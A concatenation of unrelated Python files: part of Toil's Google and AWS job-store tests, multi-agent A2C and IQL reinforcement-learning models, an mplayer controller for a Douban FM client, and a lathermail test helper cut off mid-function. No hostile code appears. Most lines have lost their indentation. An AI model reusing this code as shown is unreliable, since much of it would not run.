from toil.jobStores.googleJobStore import GoogleJobStore
fileName = 'testfile_%s' % uuid.uuid4()
url = 'gs://%s/%s' % (bucket.name, fileName)
if size is None:
return url
read_type = 'r' if USING_PYTHON2 else 'rb'
with open('/dev/urandom', read_type) as readable:
if USING_PYTHON2:
contents = readable.read(size)
else:
contents = str(readable.read(size))
GoogleJobStore._writeToUrl(StringIO(contents), urlparse.urlparse(url))
        return url, hashlib.md5(contents if USING_PYTHON2 else contents.encode('utf-8')).hexdigest()
def _hashTestFile(self, url):
from toil.jobStores.googleJobStore import GoogleJobStore
contents = GoogleJobStore._getBlobFromURL(urlparse.urlparse(url)).download_as_string()
return hashlib.md5(contents).hexdigest()
@googleRetry
def _createExternalStore(self):
from google.cloud import storage
bucketName = ("import-export-test-" + str(uuid.uuid4()))
storageClient = storage.Client()
return storageClient.create_bucket(bucketName)
@googleRetry
def _cleanUpExternalStore(self, bucket):
# this is copied from googleJobStore.destroy
try:
bucket.delete(force=True)
# throws ValueError if bucket has more than 256 objects. Then we must delete manually
except ValueError:
            bucket.delete_blobs(list(bucket.list_blobs()))
bucket.delete()
@needs_aws_s3
class AWSJobStoreTest(AbstractJobStoreTest.Test):
def _createJobStore(self):
from toil.jobStores.aws.jobStore import AWSJobStore
partSize = self._partSize()
return AWSJobStore(self.awsRegion() + ':' + self.namePrefix, partSize=partSize)
def _corruptJobStore(self):
from toil.jobStores.aws.jobStore import AWSJobStore
assert isinstance(self.jobstore_initialized, AWSJobStore) # type hinting
self.jobstore_initialized.destroy()
def testSDBDomainsDeletedOnFailedJobstoreBucketCreation(self):
"""
This test ensures that SDB domains bound to a jobstore are deleted if the jobstore bucket
failed to be created. We simulate a failed jobstore bucket creation by using a bucket in a
different region with the same name.
"""
from boto.sdb import connect_to_region
from boto.s3.connection import Location, S3Connection
from boto.exception import S3ResponseError
from toil.jobStores.aws.jobStore import BucketLocationConflictException
from toil.jobStores.aws.utils import retry_s3
externalAWSLocation = Location.USWest
for testRegion in 'us-east-1', 'us-west-2':
# We run this test twice, once with the default s3 server us-east-1 as the test region
# and once with another server (us-west-2). The external server is always us-west-1.
# This incidentally tests that the BucketLocationConflictException is thrown when using
# both the default, and a non-default server.
testJobStoreUUID = str(uuid.uuid4())
# Create the bucket at the external region
s3 = S3Connection()
for attempt in retry_s3(delays=(2, 5, 10, 30, 60), timeout=600):
with attempt:
bucket = s3.create_bucket('domain-test-' + testJobStoreUUID + '--files',
location=externalAWSLocation)
options = Job.Runner.getDefaultOptions('aws:' + testRegion + ':domain-test-' +
testJobStoreUUID)
options.logLevel = 'DEBUG'
try:
with Toil(options) as toil:
pass
except BucketLocationConflictException:
# Catch the expected BucketLocationConflictException and ensure that the bound
# domains don't exist in SDB.
sdb = connect_to_region(self.awsRegion())
next_token = None
allDomainNames = []
while True:
domains = sdb.get_all_domains(max_domains=100, next_token=next_token)
allDomainNames.extend([x.name for x in domains])
next_token = domains.next_token
if next_token is None:
break
self.assertFalse([d for d in allDomainNames if testJobStoreUUID in d])
else:
self.fail()
finally:
try:
for attempt in retry_s3():
with attempt:
                            s3.delete_bucket(bucket.name)
except S3ResponseError as e:
# The actual HTTP code of the error is in status.
# See https://github.com/boto/boto/blob/91ba037e54ef521c379263b0ac769c66182527d7/boto/exception.py#L77-L80
# See also: https://github.com/boto/boto/blob/91ba037e54ef521c379263b0ac769c66182527d7/boto/exception.py#L154-L156
if e.status == 404:
# The bucket doesn't exist; maybe a failed delete actually succeeded.
pass
else:
raise
@slow
def testInlinedFiles(self):
from toil.jobStores.aws.jobStore import AWSJobStore
jobstore = self.jobstore_initialized
for encrypted in (True, False):
n = AWSJobStore.FileInfo.maxInlinedSize()
sizes = (1, old_div(n, 2), n - 1, n, n + 1, 2 * n)
for size in chain(sizes, islice(reversed(sizes), 1)):
s = os.urandom(size)
with jobstore.writeSharedFileStream('foo') as f:
f.write(s)
with jobstore.readSharedFileStream('foo') as f:
self.assertEqual(s, f.read())
def testOverlargeJob(self):
jobstore = self.jobstore_initialized
jobRequirements = dict(memory=12, cores=34, disk=35, preemptable=True)
overlargeJobNode = JobNode(command='overlarge',
requirements=jobRequirements,
jobName='test-overlarge', unitName='onJobStore',
jobStoreID=None, predecessorNumber=0)
# Make the pickled size of the job larger than 256K
read_type = 'r' if USING_PYTHON2 else 'rb'
with open("/dev/urandom", read_type) as random:
if USING_PYTHON2:
overlargeJobNode.jobName = random.read(512 * 1024)
else:
overlargeJobNode.jobName = str(random.read(512 * 1024))
overlargeJob = jobstore.create(overlargeJobNode)
self.assertTrue(jobstore.exists(overlargeJob.jobStoreID))
overlargeJobDownloaded = jobstore.load(overlargeJob.jobStoreID)
jobsInJobStore = [job for job in jobstore.jobs()]
self.assertEqual(jobsInJobStore, [overlargeJob])
jobstore.delete(overlargeJob.jobStoreID)
def _prepareTestFile(self, bucket, size=None):
fileName = 'testfile_%s' % uuid.uuid4()
url = 's3://%s/%s' % (bucket.name, fileName)
if size is None:
return url
read_type = 'r' if USING_PYTHON2 else 'rb'
with open('/dev/urandom', read_type) as readable:
if USING_PYTHON2:
bucket.new_key(fileName).set_contents_from_string(readable.read(size))
else:
bucket.new_key(fileName).set_contents_from_string(str(readable.read(size)))
return url, hashlib.md5(bucket.get_key(fileName).get_contents_as_string()).hexdigest()
def _hashTestFile(self, url):
from toil.jobStores.aws.jobStore import AWSJobStore
key = AWSJobStore._getKeyForUrl(urlparse.urlparse(url), existing=True)
try:
contents = key.get_contents_as_string()
finally:
key.bucket.connection.close()
return hashlib.md5(contents).hexdigest()
def _createExternalStore(self):
import boto.s3
from toil.jobStores.aws.utils import region_to_bucket_location
s3 = boto.s3.connect_to_region(self.awsRegion())
try:
return s3.create_bucket(bucket_name='import-export-test-%s' % uuid.uuid4(),
location=region_to_bucket_location(self.awsRegion()))
except:
with panic(log=logger):
s3.close()
def _cleanUpExternalStore(self, bucket):
try:
for key in bucket.list():
key.delete()
bucket.delete()
finally:
bucket.connection.close()
def _largeLogEntrySize(self):
from toil.jobStores.aws.jobStore import AWSJobStore
# So we get into the else branch of reader() in uploadStream(multiPart=False):
return AWSJobStore.FileInfo.maxBinarySize() * 2
def _batchDeletionSize(self):
from toil.jobStores.aws.jobStore import AWSJobStore
return AWSJobStore.itemsPerBatchDelete
@needs_aws_s3
class InvalidAWSJobStoreTest(ToilTest):
def testInvalidJobStoreName(self):
from toil.jobStores.aws.jobStore import AWSJobStore
self.assertRaises(ValueError,
AWSJobStore,
'us-west-2:a--b')
self.assertRaises(ValueError,
AWSJobStore,
'us-west-2:' + ('a' * 100))
self.assertRaises(ValueError,
AWSJobStore,
'us-west-2:a_b')
@needs_aws_s3
@needs_encryption
@slow
class EncryptedAWSJobStoreTest(AWSJobStoreTest, AbstractEncryptedJobStoreTest.Test):
pass
class StubHttpRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
fileContents = 'A good programmer looks both ways before crossing a one-way street'
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("Content-length", len(self.fileContents))
self.end_headers()
# python 3 requires self.fileContents to be a bytestring
if sys.version_info >= (3, 0):
self.fileContents = self.fileContents.encode('utf-8')
self.wfile.write(self.fileContents)
AbstractJobStoreTest.Test.makeImportExportTests()
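# Hedged usage sketch (assumed, not from the original file): how the stub
# handler above could be served so a test can import from a real URL.
def _example_serve_stub(port=0):
    """Serve StubHttpRequestHandler on an ephemeral port and return the
    server; the caller is responsible for calling shutdown()."""
    try:
        from socketserver import TCPServer  # Python 3
    except ImportError:
        from SocketServer import TCPServer  # Python 2
    from threading import Thread
    httpd = TCPServer(('127.0.0.1', port), StubHttpRequestHandler)
    Thread(target=httpd.serve_forever).start()
    return httpd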
|
models.py
|
"""
A2C, IA2C, MA2C models
@author: Tianshu Chu
"""
import os
from agents.utils import *
from agents.policies import *
import logging
import multiprocessing as mp
import numpy as np
import tensorflow as tf
class A2C:
def __init__(self, n_s, n_a, total_step, model_config, seed=0, n_f=None):
# load parameters
self.name = 'a2c'
self.n_agent = 1
# init reward norm/clip
self.reward_clip = model_config.getfloat('reward_clip')
self.reward_norm = model_config.getfloat('reward_norm')
self.n_s = n_s
self.n_a = n_a
self.n_step = model_config.getint('batch_size')
# init tf
tf.reset_default_graph()
tf.set_random_seed(seed)
config = tf.ConfigProto(allow_soft_placement=True)
self.sess = tf.Session(config=config)
        # pass 0 for n_w so the call matches _init_policy's signature below
        self.policy = self._init_policy(n_s, n_a, 0, n_f, model_config)
self.saver = tf.train.Saver(max_to_keep=5)
if total_step:
# training
self.total_step = total_step
self._init_scheduler(model_config)
self._init_train(model_config)
self.sess.run(tf.global_variables_initializer())
def _init_policy(self, n_s, n_a, n_w, n_f, model_config, agent_name=None):
n_fw = model_config.getint('num_fw')
n_ft = model_config.getint('num_ft')
n_lstm = model_config.getint('num_lstm')
if self.name == 'ma2c':
n_fp = model_config.getint('num_fp')
policy = FPLstmACPolicy(n_s, n_a, n_w, n_f, self.n_step, n_fc_wave=n_fw,
n_fc_wait=n_ft, n_fc_fp=n_fp, n_lstm=n_lstm, name=agent_name)
else:
policy = LstmACPolicy(n_s, n_a, n_w, self.n_step, n_fc_wave=n_fw,
n_fc_wait=n_ft, n_lstm=n_lstm, name=agent_name)
return policy
def _init_scheduler(self, model_config):
lr_init = model_config.getfloat('lr_init')
lr_decay = model_config.get('lr_decay')
beta_init = model_config.getfloat('entropy_coef_init')
beta_decay = model_config.get('entropy_decay')
if lr_decay == 'constant':
self.lr_scheduler = Scheduler(lr_init, decay=lr_decay)
else:
lr_min = model_config.getfloat('LR_MIN')
self.lr_scheduler = Scheduler(lr_init, lr_min, self.total_step, decay=lr_decay)
if beta_decay == 'constant':
self.beta_scheduler = Scheduler(beta_init, decay=beta_decay)
else:
beta_min = model_config.getfloat('ENTROPY_COEF_MIN')
beta_ratio = model_config.getfloat('ENTROPY_RATIO')
self.beta_scheduler = Scheduler(beta_init, beta_min, self.total_step * beta_ratio,
decay=beta_decay)
def _init_train(self, model_config):
# init loss
v_coef = model_config.getfloat('value_coef')
max_grad_norm = model_config.getfloat('max_grad_norm')
alpha = model_config.getfloat('rmsp_alpha')
epsilon = model_config.getfloat('rmsp_epsilon')
self.policy.prepare_loss(v_coef, max_grad_norm, alpha, epsilon)
# init replay buffer
gamma = model_config.getfloat('gamma')
self.trans_buffer = OnPolicyBuffer(gamma)
def save(self, model_dir, global_step):
self.saver.save(self.sess, model_dir + 'checkpoint', global_step=global_step)
def load(self, model_dir, checkpoint=None):
save_file = None
save_step = 0
if os.path.exists(model_dir):
if checkpoint is None:
for file in os.listdir(model_dir):
if file.startswith('checkpoint'):
prefix = file.split('.')[0]
tokens = prefix.split('-')
if len(tokens) != 2:
continue
cur_step = int(tokens[1])
if cur_step > save_step:
save_file = prefix
save_step = cur_step
else:
save_file = 'checkpoint-' + str(int(checkpoint))
if save_file is not None:
self.saver.restore(self.sess, model_dir + save_file)
logging.info('Checkpoint loaded: %s' % save_file)
return True
        logging.error('Cannot find an old checkpoint for %s' % model_dir)
return False
def reset(self):
self.policy._reset()
def backward(self, R, summary_writer=None, global_step=None):
cur_lr = self.lr_scheduler.get(self.n_step)
cur_beta = self.beta_scheduler.get(self.n_step)
obs, acts, dones, Rs, Advs = self.trans_buffer.sample_transition(R)
self.policy.backward(self.sess, obs, acts, dones, Rs, Advs, cur_lr, cur_beta,
summary_writer=summary_writer, global_step=global_step)
def forward(self, ob, done, out_type='pv'):
return self.policy.forward(self.sess, ob, done, out_type)
def add_transition(self, ob, action, reward, value, done):
# Hard code the reward norm for negative reward only
if (self.reward_norm):
reward /= self.reward_norm
if self.reward_clip:
reward = np.clip(reward, -self.reward_clip, self.reward_clip)
self.trans_buffer.add_transition(ob, action, reward, value, done)
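# Hedged helper (not in the original file): reproduces the normalize-then-
# clip order used in add_transition above. For example reward=-350 with
# reward_norm=100 and reward_clip=2 becomes -3.5 and is then clipped to -2.0.
def _example_scale_reward(reward, reward_norm, reward_clip):
    if reward_norm:
        reward /= reward_norm
    if reward_clip:
        reward = np.clip(reward, -reward_clip, reward_clip)
    return reward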
class IA2C(A2C):
def __init__(self, n_s_ls, n_a_ls, n_w_ls, total_step,
model_config, seed=0):
self.name = 'ia2c'
self.agents = []
self.n_agent = len(n_s_ls)
self.reward_clip = model_config.getfloat('reward_clip')
self.reward_norm = model_config.getfloat('reward_norm')
self.n_s_ls = n_s_ls
self.n_a_ls = n_a_ls
self.n_w_ls = n_w_ls
self.n_step = model_config.getint('batch_size')
# init tf
tf.reset_default_graph()
tf.set_random_seed(seed)
config = tf.ConfigProto(allow_soft_placement=True)
self.sess = tf.Session(config=config)
self.policy_ls = []
for i, (n_s, n_w, n_a) in enumerate(zip(self.n_s_ls, self.n_w_ls, self.n_a_ls)):
# agent_name is needed to differentiate multi-agents
self.policy_ls.append(self._init_policy(n_s - n_w, n_a, n_w, 0, model_config,
agent_name='{:d}a'.format(i)))
self.saver = tf.train.Saver(max_to_keep=5)
if total_step:
# training
self.total_step = total_step
self._init_scheduler(model_config)
self._init_train(model_config)
self.sess.run(tf.global_variables_initializer())
def _init_train(self, model_config):
# init loss
v_coef = model_config.getfloat('value_coef')
max_grad_norm = model_config.getfloat('max_grad_norm')
alpha = model_config.getfloat('rmsp_alpha')
epsilon = model_config.getfloat('rmsp_epsilon')
gamma = model_config.getfloat('gamma')
self.trans_buffer_ls = []
for i in range(self.n_agent):
self.policy_ls[i].prepare_loss(v_coef, max_grad_norm, alpha, epsilon)
self.trans_buffer_ls.append(OnPolicyBuffer(gamma))
def backward(self, R_ls, summary_writer=None, global_step=None):
cur_lr = self.lr_scheduler.get(self.n_step)
cur_beta = self.beta_scheduler.get(self.n_step)
for i in range(self.n_agent):
obs, acts, dones, Rs, Advs = self.trans_buffer_ls[i].sample_transition(R_ls[i])
if i == 0:
self.policy_ls[i].backward(self.sess, obs, acts, dones, Rs, Advs, cur_lr, cur_beta,
summary_writer=summary_writer, global_step=global_step)
else:
self.policy_ls[i].backward(self.sess, obs, acts, dones, Rs, Advs, cur_lr, cur_beta)
def forward(self, obs, done, out_type='pv'):
if len(out_type) == 1:
out = []
elif len(out_type) == 2:
out1, out2 = [], []
for i in range(self.n_agent):
cur_out = self.policy_ls[i].forward(self.sess, obs[i], done, out_type)
if len(out_type) == 1:
out.append(cur_out)
else:
out1.append(cur_out[0])
out2.append(cur_out[1])
if len(out_type) == 1:
return out
else:
return out1, out2
def backward_mp(self, R_ls, summary_writer=None, global_step=None):
cur_lr = self.lr_scheduler.get(self.n_step)
cur_beta = self.beta_scheduler.get(self.n_step)
def worker(i):
obs, acts, dones, Rs, Advs = self.trans_buffer_ls[i].sample_transition(R_ls[i])
self.policy_ls[i].backward(self.sess, obs, acts, dones, Rs, Advs, cur_lr, cur_beta,
summary_writer=summary_writer, global_step=global_step)
mps = []
for i in range(self.n_agent):
            p = mp.Process(target=worker, args=(i,))
p.start()
mps.append(p)
for p in mps:
p.join()
def reset(self):
for policy in self.policy_ls:
policy._reset()
def add_transition(self, obs, actions, rewards, values, done):
if (self.reward_norm):
rewards = rewards / self.reward_norm
if self.reward_clip:
rewards = np.clip(rewards, -self.reward_clip, self.reward_clip)
for i in range(self.n_agent):
self.trans_buffer_ls[i].add_transition(obs[i], actions[i],
rewards[i], values[i], done)
class MA2C(IA2C):
def __init__(self, n_s_ls, n_a_ls, n_w_ls, n_f_ls, total_step,
model_config, seed=0):
self.name = 'ma2c'
self.agents = []
self.n_agent = len(n_s_ls)
self.reward_clip = model_config.getfloat('reward_clip')
self.reward_norm = model_config.getfloat('reward_norm')
self.n_s_ls = n_s_ls
self.n_a_ls = n_a_ls
self.n_f_ls = n_f_ls
self.n_w_ls = n_w_ls
self.n_step = model_config.getint('batch_size')
# init tf
tf.reset_default_graph()
tf.set_random_seed(seed)
config = tf.ConfigProto(allow_soft_placement=True)
self.sess = tf.Session(config=config)
self.policy_ls = []
for i, (n_s, n_a, n_w, n_f) in enumerate(zip(self.n_s_ls, self.n_a_ls, self.n_w_ls, self.n_f_ls)):
# agent_name is needed to differentiate multi-agents
self.policy_ls.append(self._init_policy(n_s - n_f - n_w, n_a, n_w, n_f, model_config,
agent_name='{:d}a'.format(i)))
self.saver = tf.train.Saver(max_to_keep=5)
if total_step:
# training
self.total_step = total_step
self._init_scheduler(model_config)
self._init_train(model_config)
self.sess.run(tf.global_variables_initializer())
class IQL(A2C):
def __init__(self, n_s_ls, n_a_ls, n_w_ls, total_step, model_config, seed=0, model_type='dqn'):
self.name = 'iql'
self.model_type = model_type
self.agents = []
self.n_agent = len(n_s_ls)
self.reward_clip = model_config.getfloat('reward_clip')
self.reward_norm = model_config.getfloat('reward_norm')
self.n_s_ls = n_s_ls
self.n_a_ls = n_a_ls
self.n_w_ls = n_w_ls
self.n_step = model_config.getint('batch_size')
# init tf
tf.reset_default_graph()
tf.set_random_seed(seed)
config = tf.ConfigProto(allow_soft_placement=True)
self.sess = tf.Session(config=config)
self.policy_ls = []
for i, (n_s, n_a, n_w) in enumerate(zip(self.n_s_ls, self.n_a_ls, self.n_w_ls)):
# agent_name is needed to differentiate multi-agents
self.policy_ls.append(self._init_policy(n_s, n_a, n_w, model_config,
agent_name='{:d}a'.format(i)))
self.saver = tf.train.Saver(max_to_keep=5)
if total_step:
# training
self.total_step = total_step
self._init_scheduler(model_config)
self._init_train(model_config)
self.cur_step = 0
self.sess.run(tf.global_variables_initializer())
def _init_policy(self, n_s, n_a, n_w, model_config, agent_name=None):
if self.model_type == 'dqn':
n_h = model_config.getint('num_h')
n_fc = model_config.getint('num_fc')
policy = DeepQPolicy(n_s - n_w, n_a, n_w, self.n_step, n_fc0=n_fc, n_fc=n_h,
name=agent_name)
else:
policy = LRQPolicy(n_s, n_a, self.n_step, name=agent_name)
return policy
def _init_scheduler(self, model_config):
lr_init = model_config.getfloat('lr_init')
lr_decay = model_config.get('lr_decay')
eps_init = model_config.getfloat('epsilon_init')
eps_decay = model_config.get('epsilon_decay')
if lr_decay == 'constant':
self.lr_scheduler = Scheduler(lr_init, decay=lr_decay)
else:
lr_min = model_config.getfloat('lr_min')
self.lr_scheduler = Scheduler(lr_init, lr_min, self.total_step, decay=lr_decay)
if eps_decay == 'constant':
self.eps_scheduler = Scheduler(eps_init, decay=eps_decay)
else:
eps_min = model_config.getfloat('epsilon_min')
eps_ratio = model_config.getfloat('epsilon_ratio')
self.eps_scheduler = Scheduler(eps_init, eps_min, self.total_step * eps_ratio,
decay=eps_decay)
def _init_train(self, model_config):
# init loss
max_grad_norm = model_config.getfloat('max_grad_norm')
gamma = model_config.getfloat('gamma')
buffer_size = model_config.getfloat('buffer_size')
self.trans_buffer_ls = []
for i in range(self.n_agent):
self.policy_ls[i].prepare_loss(max_grad_norm, gamma)
self.trans_buffer_ls.append(ReplayBuffer(buffer_size, self.n_step))
def backward(self, summary_writer=None, global_step=None):
cur_lr = self.lr_scheduler.get(self.n_step)
if self.trans_buffer_ls[0].size < self.trans_buffer_ls[0].batch_size:
return
for i in range(self.n_agent):
for k in range(10):
obs, acts, next_obs, rs, dones = self.trans_buffer_ls[i].sample_transition()
if i == 0:
self.policy_ls[i].backward(self.sess, obs, acts, next_obs, dones, rs, cur_lr,
summary_writer=summary_writer,
global_step=global_step + k)
else:
self.policy_ls[i].backward(self.sess, obs, acts, next_obs, dones, rs, cur_lr)
def forward(self, obs, mode='act', stochastic=False):
if mode == 'explore':
eps = self.eps_scheduler.get(1)
action = []
qs_ls = []
for i in range(self.n_agent):
qs = self.policy_ls[i].forward(self.sess, obs[i])
if (mode == 'explore') and (np.random.random() < eps):
action.append(np.random.randint(self.n_a_ls[i]))
else:
if not stochastic:
action.append(np.argmax(qs))
else:
qs = qs / np.sum(qs)
action.append(np.random.choice(np.arange(len(qs)), p=qs))
qs_ls.append(qs)
return action, qs_ls
def reset(self):
# do nothing
return
def add_transition(self, obs, actions, rewards, next_obs, done):
if (self.reward_norm):
rewards = rewards / self.reward_norm
if self.reward_clip:
rewards = np.clip(rewards, -self.reward_clip, self.reward_clip)
for i in range(self.n_agent):
self.trans_buffer_ls[i].add_transition(obs[i], actions[i],
rewards[i], next_obs[i], done)
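# Hedged usage sketch (not part of the original file): one on-policy
# rollout followed by a single A2C update. `env` is an assumed stand-in
# following the gym-style reset()/step() protocol, and forward() is
# assumed to return (policy, value) for the default out_type='pv'.
def _example_a2c_rollout(model, env):
    ob = env.reset()
    done = False
    for _ in range(model.n_step):
        pi, value = model.forward(ob, done)
        action = np.random.choice(np.arange(len(pi)), p=pi)
        next_ob, reward, done, _ = env.step(action)
        model.add_transition(ob, action, reward, value, done)
        ob = next_ob
    # Bootstrap the return with V(s_T) unless the episode terminated.
    R = 0 if done else model.forward(ob, done, out_type='v')
    model.backward(R)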
|
player.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Control of mplayer and other players (TODO)
player = MPlayer()
Methods:
player.start(url)
player.pause()
player.quit()
player.loop()
player.set_volume(50)
player.time_pos
player.is_alive
A queue object provides a custom get_song method; URLs are taken from it
and played (temporary; this can be abstracted later)
player.start_queue(queue)
To refresh or replace the playlist, simply repeat the command above:
player.start_queue(queue)
"""
import subprocess
import logging
import signal
import fcntl
import time
import abc
import os
from threading import Thread, Event
logger = logging.getLogger('doubanfm.player')
class NotPlayingError(Exception):
"""对播放器操作但播放器未在运行"""
pass
class PlayerUnavailableError(Exception):
"""该播放器在该系统上不存在"""
pass
class Player(object):
"""所有播放器的抽象类"""
__metaclass__ = abc.ABCMeta
# Command line name for the player (e.g. "mplayer")
_player_command = ""
# Default arguments (excluding command name)
_default_args = []
_null_file = open(os.devnull, "w")
@abc.abstractmethod
def __init__(self, default_volume=50):
"""初始化
子类需要先判断该播放器是否可用(不可用则抛出异常),再调用该方法
event: 传入的一个 Event ,用于通知播放完成
default_volume: 默认音量
"""
self.sub_proc = None # subprocess instance
self._args = [self._player_command] + self._default_args
self._exit_event = Event()
self._volume = default_volume
def __repr__(self):
if self.is_alive:
status = 'PID {0}'.format(self.sub_proc.pid)
else:
status = 'not running'
return '<{0} ({1})>'.format(self.__class__.__name__, status)
def _run_player(self, extra_cmd):
"""
        Run the player (force-quitting any instance that is already running)
        extra_cmd: extra arguments (list)
"""
# Force quit old process
if self.is_alive:
self.quit()
args = self._args + extra_cmd
logger.debug("Exec: " + ' '.join(args))
self.sub_proc = subprocess.Popen(
args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=self._null_file,
preexec_fn=os.setsid
)
# Set up NONBLOCKING flag for the pipe
flags = fcntl.fcntl(self.sub_proc.stdout, fcntl.F_GETFL)
flags |= os.O_NONBLOCK
fcntl.fcntl(self.sub_proc.stdout, fcntl.F_SETFL, flags)
# Start watchdog
Thread(target=self._watchdog).start()
def _watchdog(self):
"""
        Watch the running player (runs in a separate thread)
        Sets _exit_event after the player exits
"""
if not self.is_alive:
logger.debug("Player has already terminated.")
self._exit_event.set()
return
logger.debug("Watching %s[%d]",
self._player_command, self.sub_proc.pid)
returncode = self.sub_proc.wait()
logger.debug("%s[%d] exit with code %d",
self._player_command, self.sub_proc.pid, returncode)
self._exit_event.set()
@property
def is_alive(self):
"""判断播放器是否正在运行"""
if self.sub_proc is None:
return False
return self.sub_proc.poll() is None
def quit(self):
"""退出播放器
子类应当覆盖这个方法(但不强制),先尝试 gracefully exit ,再调用 super().quit()
"""
if not self.is_alive:
return
self.sub_proc.terminate()
# Abstract methods
@abc.abstractmethod
def start(self, url):
"""开始播放
url: 歌曲地址
"""
pass
@abc.abstractmethod
def pause(self):
"""暂停播放"""
pass
@abc.abstractmethod
def set_volume(self, volume):
"""设置音量
volume: 音量 (int)"""
self._volume = volume # int
@abc.abstractproperty
def time_pos(self):
"""获取当前播放时间
返回播放时间的秒数 (int)"""
pass
class MPlayer(Player):
_player_command = "mplayer"
_default_args = [
'-slave',
'-nolirc', # Get rid of a warning
'-quiet', # Cannot use really-quiet because of get_* queries
'-softvol', # Avoid using hardware (global) volume
        '-cache', '1024', # Use a 1 MiB cache
        '-cache-min', '0.1' # Start playing after 0.1% of the cache is filled
]
def __init__(self, *args):
super(MPlayer, self).__init__(*args)
self._exit_queue_event = False
self._loop = False
self._pause = False
self._time = 0
def _watchdog_queue(self):
self._exit_queue_event = True
while self._exit_queue_event:
if self._loop:
self.start(self.queue.get_playingsong()['url'])
else:
self.start(self.queue.get_song()['url'])
self.sub_proc.wait() # Wait for event
def start_queue(self, queue, volume=None):
self.queue = queue
self._volume = volume if volume else self._volume
if not self._exit_queue_event:
Thread(target=self._watchdog_queue).start()
else:
try:
self.sub_proc.terminate()
except OSError:
                logger.info('Failed to terminate the running player in start_queue')
def loop(self):
        self._loop = not self._loop
def next(self):
self.start_queue(self.queue, self._volume)
def start(self, url):
self._run_player(['-volume', str(self._volume), url])
def pause(self):
"""
        Querying the time while paused would make the song resume, so a
        _pause flag is kept here
"""
        self._pause = not self._pause
self._send_command('pause')
def quit(self):
# Force quit the whole process group of mplayer.
# mplayer will not respond during network startup
# and has two processes in slave mode.
        self._exit_queue_event = False # signal _watchdog_queue to stop
if not self.is_alive:
return
try:
os.killpg(os.getpgid(self.sub_proc.pid), signal.SIGKILL)
except OSError:
# The player might have exited itself.
pass
@property
def time_pos(self):
try:
            if self._pause: # while paused, return the cached _time directly
return self._time
songtime = self._send_command('get_time_pos', 'ANS_TIME_POSITION')
if songtime:
self._time = int(round(float(songtime)))
return self._time
else:
return 0
except NotPlayingError:
return 0
def set_volume(self, volume):
# volume <value> [abs] set if abs is not zero, otherwise just add delta
self._volume = volume
self._send_command("volume %d 1" % volume)
super(MPlayer, self).set_volume(volume)
# Special functions for mplayer
def _send_command(self, cmd, expect=None):
"""Send a command to MPlayer.
cmd: the command string
expect: expect the output starts with a certain string
The result, if any, is returned as a string.
"""
if not self.is_alive:
raise NotPlayingError()
logger.debug("Send command to mplayer: " + cmd)
cmd = cmd + "\n"
# In Py3k, TypeErrors will be raised because cmd is a string but stdin
# expects bytes. In Python 2.x on the other hand, UnicodeEncodeErrors
# will be raised if cmd is unicode. In both cases, encoding the string
# will fix the problem.
try:
self.sub_proc.stdin.write(cmd)
except (TypeError, UnicodeEncodeError):
self.sub_proc.stdin.write(cmd.encode('utf-8', 'ignore'))
time.sleep(0.1) # wait for mplayer (better idea?)
# Expect a response for 'get_property' only
if not expect:
return
while True:
try:
output = self.sub_proc.stdout.readline().rstrip()
output = output.decode('utf-8')
except IOError:
return None
# print output
split_output = output.split('=')
# print(split_output)
if len(split_output) == 2 and split_output[0].strip() == expect:
# We found it
value = split_output[1]
return value.strip()
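# Hedged sketch (not in the original file): a minimal object satisfying the
# duck-typed protocol start_queue() expects -- get_song() and
# get_playingsong() each return a dict carrying a 'url' key.
class _ExampleQueue(object):
    def __init__(self, urls):
        self._urls = list(urls)
        self._current = None
    def get_song(self):
        self._current = {'url': self._urls.pop(0)}
        return self._current
    def get_playingsong(self):
        return self._current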
|
utils.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import os
import time
import socket
import unittest
import smtplib
import json
from threading import Thread
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.utils import formatdate, formataddr
from email.header import Header
import lathermail
import lathermail.db
import lathermail.smtp
from lathermail.compat import Encoders, NO_CONTENT, unicode, urlencode
class InvalidStatus(Exception):
def __init__(self, response):
super(InvalidStatus, self).__init__("Invalid status {}.\n{}".format(response.status_code, response.data))
self.response = response
self.code = response.status_code
class SendEmailError(Exception):
""" Exception, raised in case send is failed.
"""
class BaseTestCase(unittest.TestCase):
inbox = "inbox"
password = "password"
port = 2525
server = None
db_name = "lathermail_test_db"
prefix = "/api/0"
@classmethod
def setUpClass(cls):
conf = lathermail.app.config
if os.getenv("LATHERMAIL_TEST_DB_TYPE", "sqlite") == "mongo":
conf["DB_URI"] = conf["SQLALCHEMY_DATABASE_URI"] = "mongodb://localhost/%s" % cls.db_name
else:
conf["DB_URI"] = conf["SQLALCHEMY_DATABASE_URI"] = "sqlite:///:memory:"
lathermail.init_app()
cls.c = lathermail.app.test_client()
super(BaseTestCase, cls).setUpClass()
cls.server = SmtpServerRunner(cls.db_name)
cls.server.start(cls.port)
@classmethod
def tearDownClass(cls):
super(BaseTestCase, cls).tearDownClass()
def setUp(self):
lathermail.db.engine.switch_db(self.db_name)
super(BaseTestCase, self).setUp()
def tearDown(self):
with lathermail.app.app_context():
lathermail.db.engine.drop_database(self.db_name)
def request(self, method, url, params=None, raise_errors=True, parse_json=True, **kwargs):
method = method.lower()
new_kwargs = {"headers": {"X-Mail-Inbox": self.inbox, "X-Mail-Password": self.password}}
new_kwargs.update(kwargs)
func = getattr(self.c, method.lower())
if params:
params = _prepare_params(params)
if method in ("get", "delete"):
new_kwargs["query_string"] = urlencode(params)
else:
new_kwargs["data"] = params
rv = func(self.prefix + url, **new_kwargs)
if parse_json:
try:
rv.json = json.loads(rv.data.decode("utf-8"))
except ValueError as e:
if rv.status_code != NO_CONTENT:
print("JSON decode error: {}, data:\n{}".format(e, rv.data))
rv.json = None
if raise_errors and rv.status_code >= 400:
raise InvalidStatus(rv)
return rv
def get(self, url, params=None, **kwargs):
return self.request("get", url, params, **kwargs)
def delete(self, url, params=None, **kwargs):
return self.request("delete", url, params, **kwargs)
def send(self, user=None, password=None, subject="test", body="Hello"):
smtp_send_email("test1@example.com", subject, "me@example.com", body,
user=user or self.inbox, password=password or self.password, port=self.port)
def _prepare_params(params):
def convert(v):
if isinstance(v, unicode):
return v.encode("utf-8")
if isinstance(v, str):
return v
return str(v)
return {convert(k): convert(v) for k, v in params.items()}
def prepare_send_to_field(name_email_pairs):
